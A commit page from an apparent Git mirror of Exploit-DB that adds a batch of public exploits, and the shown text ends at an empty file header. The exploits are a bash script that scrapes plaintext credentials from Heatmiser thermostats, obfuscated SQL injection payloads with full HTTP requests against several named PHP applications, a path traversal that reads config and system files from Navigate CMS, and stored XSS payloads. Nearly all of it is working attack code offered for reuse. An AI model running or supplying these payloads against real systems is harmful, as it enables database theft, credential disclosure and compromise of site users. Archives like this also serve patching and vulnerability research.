bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-10-17

Browse source 
13 changes to exploits/shellcodes

Microsoft Windows - 'FSCTL_FIND_FILES_BY_SID' Information Disclosure
Solaris - RSH Stack Clash Privilege Escalation (Metasploit)
VLC Media Player - MKV Use-After-Free (Metasploit)
HotelDruid 2.2.4 - 'anno' SQL Injection
Navigate CMS 2.8.5 - Arbitrary File Download
Library CMS 2.1.1 - Cross-Site Scripting
Kados R10 GreenBee - 'release_id' SQL Injection
Vishesh Auto Index 3.1 - 'fid' SQL Injection
WordPress Plugin Support Board 1.2.3 - Cross-Site Scripting
Rukovoditel Project Management CRM 2.3 - 'path' SQL Injection
MV Video Sharing Software 1.2 - 'searchname' SQL Injection
GIU Gallery Image Upload 0.3.1 - 'category' SQL Injection
Heatmiser Wifi Thermostat 1.7 - Credential Disclosure
This commit is contained in:
Offensive Security 2018-10-17 05:01:42 +00:00
parent 731dd0f423
commit 712d629b6b
14 changed files with 1415 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

27
exploits/hardware/webapps/45623.sh Executable file
View file

@ -0,0 +1,27 @@
# Exploit Title: Heatmiser Wifi Thermostat 1.7 - Credential Disclosure
# Dork: intitle:"Heatmiser Wifi Thermostat"
# Date: 2018-08-17
# Exploit Author: d0wnp0ur
# Original Discoverer: Andrew Tierney
# Vendor Lnk: https://www.heatmiser.com/en/
# Product Link: https://www.heatmiser.com/en/wireless-thermostats/
# Tested on: Heatmiser Version 1.7
# CVE: N/A
#!/bin/bash
echo Heatmiser Smart Thermometer Hack
echo By d0wnp0ur
echo Usage: $0 \<ip\[:port\]\> \(Default is 80. If it doesn\'t work, try port 8081\)
echo This tool gets the username and password of a vulnerable Heatmiser thermostat
echo Deleting old files
rm networkSetup.htm*
echo Copying disclosing page
wget http://$1/networkSetup.htm
echo Getting Username and Password
echo Username:
cat networkSetup.htm | grep "User" | grep "Name:" | awk -F 'value=' '{print $2}' | cut -d '"' -f 2
echo Password:
cat networkSetup.htm | grep "User" | grep "Password:" |grep -v -i "confirm" | awk -F 'value=' '{print $2}' | cut -d '"' -f 2
echo Success! Log in to the web interface with the above credentials.
echo http://$1

54
exploits/php/webapps/45614.txt Normal file
View file

@ -0,0 +1,54 @@
# Exploit Title: HotelDruid 2.2.4 - 'anno' SQL Injection
# Dork: N/A
# Date: 2018-10-13
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.hoteldruid.com/
# Software Link: http://www.hoteldruid.com/en/download.html
# Version: 2.2.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://192.168.1.27/[PATH]/privilegi_utenti.php?anno=2018&id_sessione=&id_utente_privilegi=[SQL]
-77'+uNIon+selECt+77,(/*!100010sELect*/+/*!10001concat*/+(@:=0,(/*!100010seLEct*/+cOUnt(*) /*!10001fROm*/+/*!100010inforMAtion_schema.tables*/+/*!10001WheRE*/(TABLE_SCheMA!=0x696e666f726d6174696f6e5f736368656d61)AND@:=/*!10001conCAt*/+(@,0x3c62723e,/*!100010taBLe_naMe*/)),@)),77,77,77,77,77--+-
GET /[PATH]/privilegi_utenti.php?anno=2018&id_sessione=&id_utente_privilegi=-77%27+uNIon+selECt+77,(/*!100010sELect*/+/*!10001concat*/+(@:=0,(/*!100010seLEct*/+cOUnt(*)%20/*!10001fROm*/+/*!100010inforMAtion_schema.tables*/+/*!10001WheRE*/(TABLE_SCheMA!=0x696e666f726d6174696f6e5f736368656d61)AND@:=/*!10001conCAt*/+(@,0x3c62723e,/*!100010taBLe_naMe*/)),@)),77,77,77,77,77--+- HTTP/1.1
Host: 192.168.1.27
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sat, 13 Oct 2018 08:21:14 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://192.168.1.27/[PATH]/gestione_utenti.php?modifica_gruppi=SI&id_utente_mod=[SQL]
%31%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%35%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%35%3d%35%2c%31%29%29%29%29%29%2d%2d%20%20%2d
GET /[PATH]/gestione_utenti.php?modifica_gruppi=SI&id_utente_mod=%31%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%35%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%35%3d%35%2c%31%29%29%29%29%29%2d%2d%20%20%2d HTTP/1.1
Host: 192.168.1.27
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sat, 13 Oct 2018 08:24:07 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

105
exploits/php/webapps/45615.txt Normal file
View file

@ -0,0 +1,105 @@
# Exploit Title: Navigate CMS 2.8.5 - Arbitrary File Download
# Dork: N/A
# Date: 2018-10-13
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.navigatecms.com/
# Software Link: http://master.dl.sourceforge.net/project/navigatecms/releases/navigate-2.8.5r1355.zip
# Version: 2.8.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# Description
# Profile type users+ can download arbitrary files.
# http://TARGET/[PATH]/navigate_download.php?wid=1&id=[FILE]
#
# /* `exploitdb`.`nv_profiles` */
# $nv_profiles = array(
# array('id' => '1','name' => 'Administrator','description' => '','menus' => '["2","3","4","6","1"]'),
# array('id' => '2','name' => 'User','description' => 'Default Navigate CMS user profile','menus' => '["2","3","7"]')
# );
#
# navigate_download.php
# ........
# $id = $_REQUEST['id'];
# if(!empty($_REQUEST['id']))
# {
# if(is_int($id))
# $item->load($id);
# else
# $item->load($_REQUEST['id']);
# }
#
# if(!$item->id)
# {
# echo 'Error: no item found with id '.$_REQUEST['id'].'.';
# session_write_close();
# $DB->disconnect(); // we don't need the database anymore (we'll see)
# exit;
# }
#
# $website = new Website();
# if(!empty($_GET['wid']))
# ........
# http://TARGET/[PATH]/navigate_download.php?wid=1&id=../../../cfg/globals.php
GET /[PATH]/navigate_download.php?wid=1&id=../../../cfg/globals.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: navigate-language=en; PHPSESSID=43c3fe79r969u85bk1qlak7o03; NVSID_ec36e8b8=43c3fe79r969u85bk1qlak7o03; navigate-tinymce-scroll=%7B%7D
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sat, 13 Oct 2018 12:36:12 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: NVSID_ec36e8b8=43c3fe79r969u85bk1qlak7o03; path=/
Set-Cookie: NVSID_ec36e8b8=43c3fe79r969u85bk1qlak7o03; expires=Sat, 13-Oct-2018 13:36:12 GMT; Max-Age=3600; path=/; domain=TARGET
Set-Cookie: PHPSESSID=43c3fe79r969u85bk1qlak7o03; expires=Sat, 13-Oct-2018 13:36:12 GMT; Max-Age=3600; path=/; domain=TARGET
Expires: Sat, 20 Oct 2018 12:36:12 GMT
Cache-Control: private
Pragma: cache
Etag: "Li4vLi4vLi4vY2ZnL2dsb2JhbHMucGhwLWdsb2JhbHMucGhwLTE1Mzk0MzQxNzItMTUzOTQzMjA3MC0w"
Accept-Ranges: bytes
Content-Disposition: inline; filename="globals.php"
Last-Modified: Sat, 13 Oct 2018 12:01:10 GMT
Content-Range: bytes 0-1847/1848
Content-Length: 1848
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
# http://localhost/[PATH]/navigate_download.php?wid=1&id=../../../../../../../../Windows/win.ini
GET /[PATH]/navigate_download.php?wid=1&id=../../../../../../../../Windows/win.ini HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: navigate-language=en; PHPSESSID=43c3fe79r969u85bk1qlak7o03; NVSID_ec36e8b8=43c3fe79r969u85bk1qlak7o03; navigate-tinymce-scroll=%7B%7D
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sat, 13 Oct 2018 12:55:57 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: NVSID_ec36e8b8=43c3fe79r969u85bk1qlak7o03; path=/
Set-Cookie: NVSID_ec36e8b8=43c3fe79r969u85bk1qlak7o03; expires=Sat, 13-Oct-2018 13:55:57 GMT; Max-Age=3600; path=/; domain=TARGET
Set-Cookie: PHPSESSID=43c3fe79r969u85bk1qlak7o03; expires=Sat, 13-Oct-2018 13:55:57 GMT; Max-Age=3600; path=/; domain=TARGET
Expires: Sat, 20 Oct 2018 12:55:57 GMT
Cache-Control: private
Pragma: cache
Etag: "Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vV2luZG93cy93aW4uaW5pLXdpbi5pbmktMTUzOTQzNTM1Ny0xNTAxMTQ5NjkxLTA="
Accept-Ranges: bytes
Content-Disposition: attachment; filename="win.ini"
Last-Modified: Thu, 27 Jul 2017 10:01:31 GMT
Content-Range: bytes 0-563/564
Content-Length: 564
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream

30
exploits/php/webapps/45616.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: Library CMS 2.1.1 - Cross-Site Scripting
# Date: 2018-10-15
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://kaasoft.pro/
# Software Link : https://library.kaasoft.pro/
# Software : Library CMS - Powerful Book Management System
# Version : v 2.1.1
# Vulernability Type : Cross-site Scripting
# Vulenrability : Stored XSS
# CVE : N/A
# A Stored XSS vulnerability has been discovered in KAASoft
# Library CMS - Powerful Book Management System 2.1.1 via the /admin/book/create/ title parameter.
# HTTP POST Request :
POST /admin/book/create/ HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://TARGET/admin/book/create/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 332
Cookie: activeLanguage=en_US; activeLanguage=en_US; _ym_uid=1539576611293792951; _ym_d=1539576611; _ym_visorc_46947615=w; _ym_isad=2; PHPSESSID=3d6jd6k6snvc2vckn15sed2k15; activeLanguage=en_US
Connection: close
%D0%9A%D1%83%D0%BF%D0%B8%D1%82%D1%8C=&title=%22%3E%3Cscript%3Ealert(%22Ismail+Tasdelen%22)%3C%2Fscript%3E&rating=&subtitle=&url=&ISBN10=&ISBN13=&edition=&publishingYear=&pages=&type=Digital&physicalForm=Book&size=Huge&binding=Hardcover&price=&language=&description=&notes=&coverId=&eBookId=&metaTitle=&metaKeywords=&metaDescription=

74
exploits/php/webapps/45617.txt Normal file
View file

@ -0,0 +1,74 @@
# Exploit Title: Kados R10 GreenBee - 'release_id' SQL Injection
# Dork: N/A
# Date: 2018-10-15
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.kados.info/
# Software Link: https://sourceforge.net/projects/kados/
# Version: R10 GreenBee
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# Description
# All users can run sql injection codes.
# POC:
# 1)
# /[PATH]/boards_buttons/update_release.php
# $request=new sqlRequest("SELECT * FROM kados_releases WHERE release_id=".$_REQUEST['release_id'],$cnx->num);
# $releaseData=$request->getObject();
# $request->sqlGet('SELECT * FROM kados_activities WHERE activity_release_id_fk='.$_REQUEST['release_id']);
# $request->countRows();
# $useChecklist=$request->rowCount;
# http://localhost/[PATH]/boards_buttons/update_release.php?release_id=[SQL]
%2d%31%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2d%2d%20%2d
GET /[PATH]/boards_buttons/update_release.php?release_id=%2d%31%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=qkb8rjor2kudi2vp2tuf9q3ot7
Connection: keep-alive
HTTP/1.1 200 OK
Date: Mon, 15 Oct 2018 12:44:09 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 1888
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# /[PATH]/boards_buttons/update_feature.php
# $request=new sqlRequest("SELECT * FROM kados_features WHERE feature_id=".$_REQUEST['feature_id'],$cnx->num);
# $featureData=$request->getObject();
# http://localhost/[PATH]/boards_buttons/update_feature.php?feature_id=[SQL]
%2d%31%20%20%55%4e%49%4f%4e%28%53%45%4c%45%43%54%28%31%29%2c%28%32%29%2c%28%33%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%35%29%29%2d%2d%20%2d
GET /[PATH]/boards_buttons/update_feature.php?feature_id=%2d%31%20%20%55%4e%49%4f%4e%28%53%45%4c%45%43%54%28%31%29%2c%28%32%29%2c%28%33%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%35%29%29%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=qkb8rjor2kudi2vp2tuf9q3ot7
Connection: keep-alive
HTTP/1.1 200 OK
Date: Mon, 15 Oct 2018 12:50:19 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 1436
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
#More than 40 files are vulnerable. Etc....

62
exploits/php/webapps/45618.txt Normal file
View file

@ -0,0 +1,62 @@
# Exploit Title: Vishesh Auto Index 3.1 - 'fid' SQL Injection
# Dork: N/A
# Date: 2018-10-15
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.vishesh.cf/
# Software Link: https://sourceforge.net/projects/vishesh-wap-auto-index/files/latest/download
# Version: 3.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://192.168.1.27/[PATH]/file.php?fid=[SQL]
-1%20UnioN%20seLECt%20112115%2c112115%2c112115%2c112115%2c112115%2c112115%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c112115%2c112115%2c112115%2c112115%2c112115%2c112115%2d%2d%20Efe
GET /[PATH]/file.php?fid=-1%20UnioN%20seLECt%20112115%2c112115%2c112115%2c112115%2c112115%2c112115%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c112115%2c112115%2c112115%2c112115%2c112115%2c112115%2d%2d%20Efe HTTP/1.1
Host: 192.168.1.27
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=nk7b5obkruk2rtd2kbm3gamg42
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2018 01:12:23 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7799
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://192.168.1.27/[PATH]/download.php?fid[SQL]
-1%20UnioN%20select%20ConcAT((SElecT%20GrouP_ConcAT(schema_nAME%20SEPAratoR%200x3c62723e)%20FRom%20INFORmatION_ScheMA.SchematA))%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2d%2d%20Efe
GET /[PATH]/download.php?fid=-1%20UnioN%20select%20ConcAT((SElecT%20GrouP_ConcAT(schema_nAME%20SEPAratoR%200x3c62723e)%20FRom%20INFORmatION_ScheMA.SchematA))%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2d%2d%20Efe HTTP/1.1
Host: 192.168.1.27
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=nk7b5obkruk2rtd2kbm3gamg42
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2018 01:18:41 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 835
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

52
exploits/php/webapps/45619.txt Normal file
View file

@ -0,0 +1,52 @@
# Exploit Title: Wordpress Plugin Support Board 1.2.3 - Cross-Site Scripting
# Date: 2018-10-16
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://schiocco.com/
# Software Link : https://board.support/
# Software : Support Board - Chat And Help Desk
# Version : v1.2.3
# Vulernability Type : Code Injection
# Vulenrability : HTML Injection and Stored XSS
# CVE : N/A
# In the Schiocco "Support Board - Chat And Help Desk" plugin 1.2.3 for WordPress,
# a Stored XSS vulnerability has been discovered in file upload areas in the
# Chat and Help Desk sections via the msg parameter
# in a /wp-admin/admin-ajax.php sb_ajax_add_message action.
# HTTP POST Request : [Stored XSS]
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://TARGET/chat/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 450
Cookie: _ga=GA1.2.1452102121.1539634100; _gid=GA1.2.1034601494.1539634100; PHPSESSID=pljbkl7n96fpl5uicnbec21f77
Connection: close
action=sb_ajax_add_message&msg=&files=https%3A%2F%2FTARGET%2Fwp-content%2Fuploads%2Fsupportboard%2F70765091%2F%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E.jpg%7C%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E.jpg&time=10%2F15%2F2018%2C+4%3A23%3A42+PM&user_id=70765091&user_img=https%3A%2F%2Fboard.support%2Fwp-content%2Fuploads%2F2017%2F07%2Fuser.jpg&user_name=James+Wilson&user_type=user&environment=wp&sb_lang=
# In the v1.2.3 version of the Support Board - Chat And Help Desk PHP & Wordpress Plugin,
# the Stored XSS vulnerability has been discovered in the HTML Injection vulnerability and
# file upload areas in the Chat and Help Desk sections of Schiocco.
# HTTP POST Request : [HTML Injection]
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://TARGET/desk-demo/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 288
Cookie: _ga=GA1.2.1452102121.1539634100; _gid=GA1.2.1034601494.1539634100; PHPSESSID=pljbkl7n96fpl5uicnbec21f77
Connection: close
action=sb_ajax_add_message&msg=%26%238220%3B%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E&files=&time=10%2F15%2F2018%2C+4%3A19%3A45+PM&user_id=70765091&user_img=https%3A%2F%2Fboard.support%2Fwp-content%2Fuploads%2F2017%2F07%2Fuser.jpg&user_name=James+Wilson&user_type=user&environment=wp&sb_lang=

47
exploits/php/webapps/45620.txt Normal file
View file

@ -0,0 +1,47 @@
# Exploit Title: Rukovoditel Project Management CRM 2.3 - 'path' SQL Injection
# Dork: N/A
# Date: 2018-10-15
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.rukovoditel.net/
# Software Link: https://www.rukovoditel.net/download.php
# Version: 2.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# Description
# The client+ user group can run sql injection codes.
#
# /* `exploitdb`.`app_access_groups` */
# $app_access_groups = array(
# array('id' => '4','name' => 'Manager','is_default' => '1','is_ldap_default' => '0','ldap_filter' => '','sort_order' => '2'),
# array('id' => '5','name' => 'Developer','is_default' => '0','is_ldap_default' => '0','ldap_filter' => '','sort_order' => '1'),
# array('id' => '6','name' => 'Client','is_default' => '0','is_ldap_default' => '0','ldap_filter' => '','sort_order' => '0')
# );
#
# http://192.168.1.27/[PATH]/index.php?module=items/info&path=1-1[SQL]
%27+%20and%20(sELect%201%20fROm%20(sELect%20cOUNt(*),conCAT((sELect(sELect%20conCAT(cast(daTABase()%20as%20char),0x7e))%20fROm%20inforMATion_SCHema.TABles%20where%20TABle_SCHema=daTABase()%20limit%200,1),floor(rand(0)*2))x%20fROm%20inforMATion_SCHema.TABles%20gROup%20by%20x)a)%20AND%20%27Efe%27=%27Efe
GET /[PATH]/index.php?module=items/info&path=1-1%27+%20and%20(sELect%201%20fROm%20(sELect%20cOUNt(*),conCAT((sELect(sELect%20conCAT(cast(daTABase()%20as%20char),0x7e))%20fROm%20inforMATion_SCHema.TABles%20where%20TABle_SCHema=daTABase()%20limit%200,1),floor(rand(0)*2))x%20fROm%20inforMATion_SCHema.TABles%20gROup%20by%20x)a)%20AND%20%27Efe%27=%27Efe HTTP/1.1
Host: 192.168.1.27
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: cookie_test=please_accept_for_session; sid=0i0o9mn52bt17fpchg7rinmsd7
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2018 00:12:43 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: cookie_test=please_accept_for_session; expires=Mon, 15 Oct 2018 00:12:43 GMT; Max-Age=2592000
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 1058
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

34
exploits/php/webapps/45621.txt Normal file
View file

@ -0,0 +1,34 @@
# Exploit Title: MV Video Sharing Software 1.2 - 'searchname' SQL Injection
# Dork: N/A
# Date: 2018-10-16
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://melerovideo.com/software/
# Software Link: https://sourceforge.net/projects/mvvideosharingsoftware/
# Version: 1.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/search.php
# POST /searchname=[SQL]
POST /[PATH]/search.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 404
searchname=%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%29%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2d%2d%20%45%66%65
HTTP/1.1 200 OK
Date: Tue, 16 Oct 2018 08:45:43 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

32
exploits/php/webapps/45622.txt Normal file
View file

@ -0,0 +1,32 @@
